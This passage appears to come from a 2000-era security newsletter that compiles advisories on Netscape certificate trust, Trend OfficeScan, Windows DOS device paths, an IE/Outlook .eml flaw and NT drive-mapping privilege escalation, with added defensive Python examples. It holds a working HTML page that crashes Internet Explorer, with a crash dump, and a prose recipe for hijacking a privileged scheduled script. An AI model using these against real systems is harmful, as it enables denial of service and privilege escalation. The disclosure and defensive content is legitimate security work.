      previous certificate is removed from the database and the website is
      re-accessed, the standard warning appears asking the user if they
      wish to trust the certificate. Since the new certificate is
      cryptographically different from the old certificate, no trust
      relationship should exist (only the signer is the same.)

      Netscape does not replace the old expired certificate with the
      new certificate, and does not add the new certificate to the database.
      Nor does it tell the user that the new certificate a site is sending
      does not match a previous certificate.

      Why is this a problem? 

      The problem is that there is an inherited trust between an
      expired certificate and an active certificate, where there really
      shouldn't be. If any trust should be there, it certainly shouldn't be
      with an expired certificate. The idea here is that Netscape should
      complain about a site which has a certificate different than what
      Netscape has in its database. When you accept a certificate from a
      website whose certificate signer you do not already trust, you should
      be warned if that certificate is no longer valid or when the server
      has been issued a new one. You are trusting that certificate and its
      signer, not that site. If the site's certificate changes, you should be
      warned about the change and asked if you still want to trust the site.
      If a hacker manages to gain access to the key and the certificate, and
      changes the key and the certificate, a warning may be the only thing
      to protect you from that hacker becoming a man in the middle in the
      attack.

      What should be the solution?

      An option, in the browser, to allow the user to be warned the first
      time a certificate changes on a webserver. If the previous certificate
      is expired, and the current certificate on a site is different, the
      user should be warned of the change, and asked whether they wish
      the new certificate to replace the previous one. That way, paranoid
      users like myself can be warned when a certificate changes, so that
      we can decide whether the new certificate should be trusted. Of
      course, if I already trust the certificate signer, then I shouldn't be
      prompted about the certificate.
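      The two policies the post contrasts, as an added example (not Netscape's
      certificate database code). A per-site store records the exact
      certificate the user accepted. evaluate_as_described() models the
      behaviour reported above: once something for the site has been accepted,
      a fresh certificate from the same signer is let through, and the stored
      certificate's expiry is never consulted. evaluate_hardened() is what the
      post asks for: trust attaches to the exact certificate (or to a signer
      the user already trusts), so a different certificate, including one that
      replaced an expired one, is surfaced for a decision. Fingerprints, names
      and dates are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class Cert:
    fingerprint: str      # digest of the DER certificate (constructed values below)
    subject: str
    issuer: str           # the signer
    not_after: datetime


def day(year, month, day_of_month):
    """Helper so dates can be written without importing datetime elsewhere."""
    return datetime(year, month, day_of_month, tzinfo=timezone.utc)


ALLOW = "allow"
PROMPT_UNKNOWN = "prompt: unknown site certificate"
PROMPT_CHANGED = "prompt: certificate changed since it was accepted"
PROMPT_EXPIRED = "prompt: presented certificate has expired"


class SiteCertStore:
    def __init__(self, trusted_signers=()):
        self.trusted_signers = set(trusted_signers)   # signers the user already trusts
        self.accepted = {}                             # host -> Cert the user accepted

    def accept(self, host, cert):
        """Record the user's explicit decision; the only way the store changes."""
        self.accepted[host] = cert

    def evaluate_as_described(self, host, presented, now):
        """Model of the reported behaviour: any stored certificate for the site
        with the same signer makes a non-expired new certificate acceptable."""
        if presented.issuer in self.trusted_signers:
            return ALLOW
        stored = self.accepted.get(host)
        if stored is None:
            return PROMPT_UNKNOWN
        if presented.not_after <= now:
            return PROMPT_EXPIRED
        return ALLOW if stored.issuer == presented.issuer else PROMPT_CHANGED

    def evaluate_hardened(self, host, presented, now):
        """Trust is in the exact certificate: any change is put to the user,
        whether or not the stored certificate has since expired."""
        if presented.issuer in self.trusted_signers:
            return ALLOW
        stored = self.accepted.get(host)
        if stored is None:
            return PROMPT_UNKNOWN
        if presented.fingerprint != stored.fingerprint:
            return PROMPT_CHANGED
        if presented.not_after <= now:
            return PROMPT_EXPIRED
        return ALLOW
```

      In the hardened path a key compromise of the kind the post worries
      about shows up as PROMPT_CHANGED at the first visit after the swap,
      because the attacker cannot present the fingerprint the user accepted.
      The cost is a prompt on every legitimate renewal, which is why the post
      frames it as an option for users who want it.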
      
      
      @HWA

101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      Posted @ March 17, 2000
      Trend Micro has released a new version of OfficeScan Corporate
      Edition - version 3.51 - that eliminates two security vulnerabilities
      found on previous versions ... 
      
      "OfficeScan DoS & Message Replay" Vulnerability
      Posted to BugTraq on March 17, 2000

      Summary
      =======
      Trend Micro has released a new version of OfficeScan Corporate
      Edition - version 3.51 - that eliminates two security vulnerabilities
      found on previous versions. Previous versions of OfficeScan allow
      intruders within a firewall to initiate a DoS attack on the OfficeScan
      client (tmlisten.exe) as well as to capture OfficeScan commands.
      These commands can be replayed and used to change other
      OfficeScan client configurations.

      Issues
      ======
      Trend OfficeScan version 3.5 or earlier versions perform incomplete
      parsing and buffer overflow checking in its Windows NT client. If a
      malicious user has the ability to telnet and submit some form of
      message to the OfficeScan NT client, the OfficeScan service consumes
      100% CPU processing power. In addition, communication between
      the OfficeScan server and client was established with insufficient
      encryption and authentication, which allows a malicious user to sniff
      and replay OfficeScan commands.

      Implementation
      ==============
      Trend Micro has corrected the DoS attack issue by correctly parsing
      and handling commands or arbitrary messages sent to the
      OfficeScan client.

      Trend Micro has implemented the MD5 Message-Digest Algorithm to
      ensure that the commands between the server and the clients can
      not be decrypted or captured to be replayed to other clients. For
      details about the MD5 algorithm see:
      http://theory.lcs.mit.edu/~rivest/rfc1321.txt

      Affected Software Versions
      ==========================
      Trend OfficeScan Corporate Edition 3.0
      Trend OfficeScan Corporate Edition 3.11
      Trend OfficeScan Corporate Edition 3.13
      Trend OfficeScan Corporate Edition 3.5
      Trend OfficeScan for Microsoft SBS 4.5

      Patch Availability
      ==================
      - http://www.antivirus.com/download/ofce_patch.htm

      More Information
      ================
      Please see the following references for more information related to
      this issue.
      - Trend Micro Security Bulletin:
      http://www.antivirus.com/download/ofce_patch_35.htm

      - Frequently Asked Questions: Trend Micro Knowledge Base
      http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

      Obtaining Support on this Issue
      ===============================
      This is a fully supported release. Information on contacting Trend
      Micro Technical Support is available at
      http://www.trend.com/support/default.htm
      
      
      @HWA

102.0 HNS:MS Security bulletin#17
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      Posted @ March 17, 2000
      Microsoft has released a patch that eliminates a security
      vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and
      Windows 98 Second Edition. The vulnerability could cause a user's
      system to crash, if they attempted to access a file or folder whose
      path contained certain reserved words. ... 
      
      
      MS Security bulletin#17
      Posted to BugTraq on March 17, 2000

      Microsoft Security Bulletin (MS00-017)
      --------------------------------------

      Patch Available for "DOS Device in Path Name" Vulnerability

      Originally Posted: March 16, 2000

      Summary
      =======
      Microsoft has released a patch that eliminates a security
      vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and
      Windows 98 Second Edition. The vulnerability could cause a user's
      system to crash, if they attempted to access a file or folder whose
      path contained certain reserved words.

      Frequently asked questions regarding this vulnerability can be
      found at
      http://www.microsoft.com/technet/security/bulletin/fq00-017.asp.

      Issue
      =====
      DOS device names are reserved words, and cannot be used as
      folder or file names. When parsing a reference to a file or folder,
      Windows correctly checks for the case in which a single DOS
      device name is used in the path, and treats it as invalid. However, it
      does not check for the case in which the path includes multiple
      DOS device names. When Windows attempts to interpret the device
      name as a file resource, it performs an illegal resource access that
      usually results in a crash.

      Because it is not possible to create files or folders that contain
      DOS device names, it would be unusual for a user to try to access
      one under normal circumstances. The chief threat posed by this
      vulnerability is that a malicious user could attempt to entice a user
      to attempt such an access. For instance, if a web site operator
      hosted a hyperlink that referenced such a path, clicking the link
      would result in the user's machine crashing. Likewise, a web page or
      HTML mail that specified a local file as the source of rendering
      information could cause the user's machine to crash when it was
      displayed. If this happened, the machine could be put back into
      normal service by restarting it. 
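      The bulletin's point is that the path parser checked for a single
      reserved name but not for several in one path. An input validator that
      inspects every component catches both cases; the one below is an added
      example written for this page, not Microsoft's code, and the device
      name list and sample paths are my own. It splits on both separators so
      that URL-style and backslash paths are treated the same way, and it
      strips a trailing extension before comparing, since a name such as
      NUL.txt still refers to the NUL device.

```python
import re

# Names Windows reserves for DOS devices; matched case-insensitively, in any
# path component, with or without a trailing extension.
DOS_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {"COM%d" % i for i in range(1, 10)}
    | {"LPT%d" % i for i in range(1, 10)}
)


def device_components(path):
    """Return every component of `path` that names a DOS device, in order.

    Every component is inspected, so a path holding two or more device
    names (the case the bulletin describes) is reported just like one."""
    hits = []
    for comp in re.split(r"[\\/]+", path):
        if not comp:
            continue
        # Drop the extension and trailing spaces before comparing, so that
        # "nul.txt" and "nul " are recognised as the NUL device.
        base = comp.split(".", 1)[0].rstrip(" ")
        if base.upper() in DOS_DEVICE_NAMES:
            hits.append(comp)
    return hits


def is_safe_path(path):
    """True when no component of the path is a reserved device name."""
    return not device_components(path)


def validate_or_raise(path):
    """Gatekeeper for code that would hand a user-supplied path to the OS."""
    bad = device_components(path)
    if bad:
        raise ValueError("reserved DOS device name(s) in path: %s" % ", ".join(bad))
    return path
```

      The validator is meant to run before a path reaches any file API,
      for instance on the `src`/`href` values of content a mail client or
      browser is about to render, rejecting rather than normalising anything
      it flags.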

      Affected Software Versions
      ==========================
      - Microsoft Windows 95
      - Microsoft Windows 98
      - Microsoft Windows 98 Second Edition

      Patch Availability
      ==================
      - Windows 95:
      http://www.microsoft.com/downloads/release.asp?releaseID=19491
      - Windows 98 and Windows 98 Second Edition:
      http://www.microsoft.com/downloads/release.asp?ReleaseID=19389
      NOTE: Additional security patches are available at the Microsoft
      Download Center

      NOTE:
      The patch will be available shortly at the WindowsUpdate site. When
      this happens, we will modify the bulletin to provide additional
      information.

      More Information
      ================
      Please see the following references for more information related to
      this issue.
      - Microsoft Security Bulletin MS00-017: Frequently Asked
      Questions,
      http://www.microsoft.com/technet/security/bulletin/fq00-017.asp
      - Microsoft Knowledge Base article Q256015 discusses this issue
      and will be available soon.
      - Microsoft TechNet Security web site,
      http://www.microsoft.com/technet/security/default.asp.

      Obtaining Support on this Issue
      ===============================
      This is a fully supported patch. Information on contacting
      Microsoft Technical Support is available at
      http://support.microsoft.com/support/contact/default.asp

      Revisions
      =========
      - March 16, 2000: Bulletin Created.
      
      @HWA

103.0 HNS:Georgi Guninski security advisory #9
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      
      Posted @ March 15, 2000
      There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT
      (probably others) which allows executing arbitrary programs using
      .eml files. This may be exploited when browsing web pages or
      opening an email message in Outlook. ... 
      
      Georgi Guninski security advisory #9
      Posted to BugTraq on March 15, 2000

      IE and Outlook 5.x allow executing arbitrary programs using .eml
      files

      Disclaimer:
      The opinions expressed in this advisory and program are my own
      and not of any company. The usual standard disclaimer applies,
      especially the fact that Georgi Guninski is not liable for any damages
      caused by direct or indirect use of the information or functionality
      provided by this program. Georgi Guninski bears NO responsibility
      for content or misuse of this program or any derivatives thereof.

      Description:
      There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT
      (probably others) which allows executing arbitrary programs using
      .eml files. This may be exploited when browsing web pages or
      opening an email message in Outlook. This may lead to taking
      control over the user's computer. It is also possible to read and send
      local files.

      Details:
      The problem is creating files in the TEMP directory with known
      name and arbitrary content. One may place a .chm file in the TEMP
      directory which contains the "shortcut" command and when the .chm
      file is opened with the showHelp() method programs may be
      executed.
      This vulnerability may be exploited by HTML email message in
      Outlook.

      Demonstration which starts Wordpad:
      http://www.nat.bg/~joro/eml.html
      
      (Note: Georgi seems to have pulled the script, it gives a 404
      now .. - Ed/Cruci)

      Workaround: Disable Active Scripting.

      Copyright 2000 Georgi Guninski
      
      
103.1 PSS:More MSIE crashing info by NtWakO
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Packet Storm Security
              http://packetstorm.securify.com/
              
      --[Tuesday, March 21, 2000 by NtWaK0 / biteraser]------------------------------
      
      --[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY* Object]---
      
      --[Tested on  Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too ?]-------
      
      Here is the story, while having a chat (IRC) with biteraser today heh, he
      suddenly said *fu*k* hrm... I said what is wrong
      
      He said I JUST CRASHED IE..
      After some investigation it turned out to be the *HISTORY* Object :).
      
      So if you cut and paste the html code in a file, then open it with IE, you
      will be able to see the crash.
      
      Note: key line is: <HS:HISTORY ID="HS">, without it IE won't crash and
      behavior should be #default. It can be exploited more.
      
      
      --[SNIP]-----------------------------------------------------------------------
      <HTML>
      <HEAD>
      <Title>Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx</Title>
      </HEAD>
      <BODY>
      <xml:namespace ns='CallFixPage' prefix='HS'>
      <STYLE>
              @media all{HS\:HISTORY {behavior:url(#default);}}
      </STYLE>
      <!--XML code -->
      <HS:HISTORY ID="HS" />
      <!-- End XML code -->
      
      </BODY>
      </HTML>
      --[SNIP]-----------------------------------------------------------------------
      
      
      
      NOTE: Crash Memory dump.
      
      
      
      Application exception occurred:
              App: exe\iexplore.dbg (pid=219)
              When: 3/21/2000 @ 12:52:24.60
              Exception number: c0000005 (access violation)
      
      *----> System Information <----*
              Computer Name: INFOSEC-BRAIN
              User Name: Administrator
              Number of Processors: 1
              Processor Type: x86 Family 6 Model 6 Stepping 10
              Windows Version: 4.0
              Current Build: 1381
              Service Pack: 6
              Current Type: Uniprocessor Free
              Registered Organization: NtWaK0
              Registered Owner: NtWaK0
      
      (00400000 - 00412000) exe\iexplore.dbg
      (77f60000 - 77fbe000) dll\ntdll.dbg
      (77f00000 - 77f5e000) dll\kernel32.dbg
      (77e70000 - 77ec5000) dll\user32.dbg
      (77ed0000 - 77efc000) dll\gdi32.dbg
      (77dc0000 - 77dff000) dll\advapi32.dbg
      (77e10000 - 77e67000) dll\rpcrt4.dbg
      (70bd0000 - 70c19000) SHLWAPI.dbg
      (71500000 - 71610000) SHDOCVW.dbg
      (00760000 - 007e9000) COMCTL32.dbg
      (77c40000 - 77d7b000) dll\shell32.dbg
      (71740000 - 71740000)
      (22000000 - 22000000)
      (77b20000 - 77bd7000) dll\ole32.dbg
      (71050000 - 71118000) BROWSEUI.dbg
      (717b0000 - 717b0000)
      (779b0000 - 779b9000) dll\linkinfo.dbg
      (77720000 - 77731000) dll\mpr.dbg
      (77a40000 - 77a4d000) dll\ntshrui.dbg
      (78000000 - 78040000)
      (77800000 - 7783a000) dll\netapi32.dbg
      (77840000 - 77849000) dll\NetRap.dbg
      (777e0000 - 777ed000) dll\samlib.dbg
      (65340000 - 653d2000) oleaut32.dbg
      (70290000 - 702fe000) URLMON.dbg
      (77a90000 - 77a9b000) dll\version.dbg
      (779c0000 - 779c8000) dll\lz32.dbg
      (77bf0000 - 77bf7000) dll\rpcltc1.dbg
      (70410000 - 70492000) MLANG.dbg
      (70000000 - 70242000) MSHTML.dbg
      (01700000 - 01772000) WININET.dbg
      (48080000 - 48080000)
      (76ab0000 - 76ab5000) dll\imm32.dbg
      (70f00000 - 70f1a000) dll\iepeers.dbg
      
      State Dump for Thread Id 0xd2
      
      eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000
      edi=80004005
      eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0         nv up ei pl nz na pe
      nc
      cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
      efl=00000202
      
      
      function: Ordinal158
              70bd180d 8b542408         mov     edx,[esp+0x8]
      ss:0129808f=????????
              70bd1811 56               push    esi
              70bd1812 8b742408         mov     esi,[esp+0x8]
      ss:0129808f=????????
      FAULT ->70bd1816 0fb706           movzx   eax,word ptr [esi]
      ds:00000000=????
              70bd1819 46               inc     esi
              70bd181a 46               inc     esi
              70bd181b 83f841           cmp     eax,0x41
              70bd181e 7c05             jl      Ordinal158+0x18 (70bd1825)
              70bd1820 83f85a           cmp     eax,0x5a
              70bd1823 7e1d             jle     Ordinal158+0x35 (70bd1842)
              70bd1825 0fb70a           movzx   ecx,word ptr [edx]
      ds:70f01ef4=0043
              70bd1828 42               inc     edx
              70bd1829 42               inc     edx
              70bd182a 83f941           cmp     ecx,0x41
              70bd182d 7c05             jl      Ordinal158+0x27 (70bd1834)
      
      *----> Stack Back Trace <----*
      
      FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
      000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
      000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
      000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
      00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
      00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
      00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
      00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
      0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60
      MSHTML!DllGetClassObject
      0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8
      MSHTML!MatchExactGetIDsOfNames
      00000000 00000000 00000000 00000000 00000000 00000000
      MSHTML!MatchExactGetIDsOfNames
      
      *----> Raw Stack Dump <----*
      00069688  0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70
      ...pWm.p.......p
      00069698  68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00
      h.......@.......
      000696a8  78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00
      x..p..}.........
      000696b8  38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00
      8Y,.@.....}.....
      000696c8  00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01
      ...........p..}.
      000696d8  00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00
      ....4Z,.8Y,.@...
      000696e8  40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00
      @....Y,..@......
      000696f8  8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01
      ...p....4Z,.8Y,.
      00069708  40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00
      @...0Y,.0Y,.`...
      00069718  44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01
      D......p....8Y,.
      00069728  40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00
      @...0Y,..Y,.....
      00069738  10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00  .4,.. .p....`...
      00069748  5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00 00  ]~.p.....Y,.|...
      00069758  7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00
      |.........\.C.r.
      00069768  61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00
      a.s.h._.A.L.L._.
      00069778  49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00
      I.E.4._.I.E.5._.
      00069788  6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00
      o.n._.W.i.n.d.o.
      00069798  77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00
      w.s._.9.x._.a.n.
      000697a8  64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00
      d._.A.l.l._.N.T.
      000697b8  5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00
      _.S.P.x._.w.i.t.
      
      State Dump for Thread Id 0xc6
      
      eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30
      edi=000872e8
      eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0         nv up ei pl nz na po
      nc
      cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
      efl=00000206
      
      
      function: ZwReplyWaitReceivePort
              77f67f9c b890000000       mov     eax,0x90
              77f67fa1 8d542404         lea     edx,[esp+0x4]
      ss:01a7e7f7=????????
              77f67fa5 cd2e             int     2e
              77f67fa7 c21000           ret     0x10
              77f67faa 8bc0             mov     eax,eax
      
      *----> Stack Back Trace <----*
      
      FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
      0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff
      ntdll!ZwReplyWaitReceivePort
      00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate
      
      State Dump for Thread Id 0xee
      
      eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c
      edi=0008a2ec
      eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0         nv up ei pl nz na pe
      nc
      cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
      efl=00000202
      
      
      function: NtDelayExecution
              77f67914 b827000000       mov     eax,0x27
              77f67919 8d542404         lea     edx,[esp+0x4]
      ss:0249e96f=????????
              77f6791d cd2e             int     2e
              77f6791f c20800           ret     0x8
              77f67922 8bc0             mov     eax,eax
      
      *----> Stack Back Trace <----*
      
      FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
      0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution
      0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep
      00000000 00000000 00000000 00000000 00000000 00000000 iexplore!<nosymbols>
      
      *----> Raw Stack Dump <----*
      0126ff68  f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00
      ...w....|.&.....
      0126ff78  00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01
      ......<.......&.
      0126ff88  be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77
      ...w`..........w
      0126ff98  60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77
      `......w.......w
      0126ffa8  e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02
      ...........w....
      0126ffb8  40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02
      @....N.w........
      0126ffc8  40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01
      @.......@.....&.
      0126ffd8  00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77
      ........D..w8..w
      0126ffe8  00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77
      ............m..w
      0126fff8  e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00
      ................
      01270008  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270018  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270028  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270038  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270048  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270058  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270068  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270078  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270088  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      01270098  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      
      State Dump for Thread Id 0xec
      
      eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4
      edi=016fff78
      eip=77f682db esp=016fff5c ebp=016fff80 iopl=0         ov up ei pl nz na po
      cy
      cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
      efl=00000a07
      
      
      function: NtWaitForSingleObject
              77f682d0 b8c5000000       mov     eax,0xc5
              77f682d5 8d542404         lea     edx,[esp+0x4]
      ss:0292e963=????????
              77f682d9 cd2e             int     2e
              77f682db c20c00           ret     0xc
              77f682de 8bc0             mov     eax,eax
      
      *----> Stack Back Trace <----*
      
      FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
      016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc
      ntdll!NtWaitForSingleObject
      77f67610 4affc033 89257508 ff900c42 037d044a 520004c2
      kernel32!WaitForSingleObject
      
      *----> Raw Stack Dump <----*
      016fff5c  a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01
      ...w........x.o.
      016fff6c  00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a
      .....$,.@u.w.D_.
      016fff7c  fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00
      .....v.w7O.w....
      016fff8c  c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00
      .'.........p....
      016fff9c  c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01
      .'...,.w.$,...o.
      016fffac  10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70
      .$,....pP..w...p
      016fffbc  de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77
      .N.w.$,..,.wP..w
      016fffcc  10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00
      .$,.P..w..o.T...
      016fffdc  ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00
      ....D..w8..w....
      016fffec  00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01
      ...........p.$,.
      016ffffc  00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00
      ....MZ..........
      0170000c  ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00
      ............@...
      0170001c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      0170002c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
      ................
      0170003c  c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c
      ............!..L
      0170004c  cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63  .!This program c
      0170005c  61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20  annot be run in 
      0170006c  44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00  DOS mode....$...
      0170007c  00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4
      ....c...'...'...
      0170008c  27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4
      '...'.......~...
      
      --[END]------------------------------------------------------------------------
      
      Cheers,
      |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
      "The only secure computer is one that's unplugged, locked in a
      safe, and buried 20 feet under the ground in a secret location...
      and I'm not even too sure about that one" --Dennis Hughes, FBI.
      |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
      Live Well Do Good --:)
      
      Cheers,
      ------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
      "The only secure computer is one that's unplugged, locked in a
      safe, and buried 20 feet under the ground in a secret location...
      and I'm not even too sure about that one" --Dennis Hughes, FBI.
      -----------------------------------------------------------------
      Live Well Do Good --:)
      
      
      @HWA

104.0 HNS:Drive Mappings in Interactive Login
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      Posted @ March 15, 2000
      Issue: Drive Mappings in Interactive Login affect Processes running
      in context of Schedule User. Points indicating this is a bug/security
      exploit and not by design (as some have indicated to the author) ...
      
      Drive Mappings in Interactive Login
      Posted to BugTraq on March 15, 2000

      Issue: Drive Mappings in Interactive Login affect Processes running
      in context of Schedule User. 

      Points indicating this is a bug/security exploit and not by design (as
      some have indicated to me) 

      1. Drive mappings are individual to each user, as seen by their
      location in the registry under HKCU\Network. This point alone
      indicates a bug. Why should the *personal* drive mappings of an
      interactive login session have *any* effect on a service running in a
      different user context, in a supposedly secure environment? They
      shouldn't, plain and simple. 

      2. KB Article Q130668 is the only article I could find which has any
      relationship to this issue, but it deals with a "bug" when the drives
      are mapped to Netware Volumes using GSNW. However, reading
      between the lines, one can see that the behavior described (which is
      identical in both Netware and NT drive mappings) is not by design,
      otherwise, why would they state this: Microsoft has confirmed this
      to be a problem in Windows NT Workstation and Server versions
      3.5, 3.51, and 4.0... They do offer up a solution to one half of the
      problem - that is when the scheduled process leaves a mapped
      drive, which then affects any interactive processes by preventing the
      use of this drive (unless appropriate permissions exist for the
      interactive user). But they make no mention of the other half - that a
      non-privileged user can affect the environment of the scheduled
      process, which is often in a privileged account context. 

      Take the following scenario: 

      A "secure" NT workstation is configured with scheduler running in a
      user context that has specific elevated rights in order to perform
      unattended administrative functions based on scripts that are stored
      on a server. But one of the tasks performed in these scripts requires
      a mapped drive letter; UNC paths won't work. So to be sure, the
      script begins by mapping a drive letter to the shared network
      resource containing the patches and updates placed there when
      required. Often these patches are security fixes and the like, and
      the scheduler dutifully applies them to some large number of
      machines as directed in the script. 

      Here comes the exploit. If an interactive login is present, and the
      same drive letter is already mapped by a user, the net use in the
      scheduled script will fail, as will the required hotfix or update. Not a
      pretty picture in a large LAN whose security and stability may rely
      on timely installation of these updates. This is the simplest
      "exploit". 

      Next we extend this a bit further: the user maps a drive letter in an
      interactive login, and places in it a script with the same filename as
      that called by the scheduled update, and makes sure the schedule
      user has permissions to this file and network resource. All of this
      could be performed by a non-privileged user. The schedule service
      will now execute this script in the elevated user context, and the
      script could be instructed to install a trojan, add the user to the local
      Admin group, or whatever. The bottom line is that this design flaw
      can be easily exploited to allow any user with interactive login rights
      to a workstation to elevate himself to the rights of the schedule user,
      which is often Administrator of the workstation. 

      I have tested this on NT4 SP5 and 6a. (Note this is without IE5
